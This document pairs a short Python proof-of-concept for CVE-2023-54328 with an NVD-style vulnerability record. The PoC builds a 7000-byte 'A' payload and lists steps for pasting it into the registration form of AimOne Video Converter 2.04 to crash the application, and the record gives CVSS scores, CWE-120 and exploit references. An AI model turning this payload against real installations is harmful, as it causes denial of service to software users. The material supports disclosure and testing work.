CVE-2023-54328

#!/usr/bin/env python3 """ CVE-2023-54328 PoC - AimOne Video Converter Buffer Overflow in Registration Form This PoC generates a 7000-byte payload to trigger a buffer overflow in the registration form. """ import struct import sys def generate_payload(): """ Generate a 7000-byte payload to trigger buffer overflow """ # Target payload size to trigger overflow payload_size = 7000 # Generate the malicious payload # Using pattern that can help identify overflow location payload = b'A' * payload_size return payload def create_registration_data(): """ Create registration form data with the malicious payload """ payload = generate_payload() # Registration form fields structure registration_data = { 'username': payload, 'serial': payload, 'email': payload, 'registration_key': payload } return registration_data def trigger_vulnerability(): """ Simulate triggering the vulnerability by submitting the payload """ print('[+] Generating CVE-2023-54328 PoC payload...') print(f'[+] Payload size: {len(generate_payload())} bytes') data = create_registration_data() # In real attack scenario, this would send the data to the registration endpoint # For AimOne Video Converter, this would be the registration form in the application print('[+] Payload generated for registration form fields:') for field, value in data.items(): print(f' {field}: {len(value)} bytes') print('[+] To trigger the vulnerability:') print(' 1. Open AimOne Video Converter 2.04 Build 103') print(' 2. Navigate to Help -> Register') print(' 3. Paste the generated payload into registration fields') print(' 4. Click Register button') print(' 5. Application should crash with buffer overflow') return data if __name__ == '__main__': trigger_vulnerability()

{"cve": {"id": "CVE-2023-54328", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:59.797", "lastModified": "2026-02-02T16:16:17.490", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AimOne Video Converter 2.04 Build 103 contains a buffer overflow vulnerability in its registration form that causes application crashes. Attackers can generate a 7000-byte payload to trigger the denial of service and potentially exploit the software's registration mechanism."}, {"lang": "es", "value": "AimOne Video Converter 2.04 Build 103 contiene una vulnerabilidad de desbordamiento de búfer en su formulario de registro que provoca cierres de la aplicación. Los atacantes pueden generar una carga útil de 7000 bytes para activar la denegación de servicio y potencialmente explotar el mecanismo de registro del software."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aimonesoft:aimone_video_converter:2.04:*:*:*:*:*:*:*", "matchCriteriaId": "CEF31823-F6C3-4B13-8D20-65B5F9F2064A"}]}]}], "references": [{"url": "https://aimone-video-converter.software.informer.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://web.archive.org/web/20180621094013/http://www.aimonesoft.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51196", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/aimone-video-converter-build-buffer-overflow-in-registration-form", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51196", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/aimone-video-converter-build-buffer-overflow-in-registration-form", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}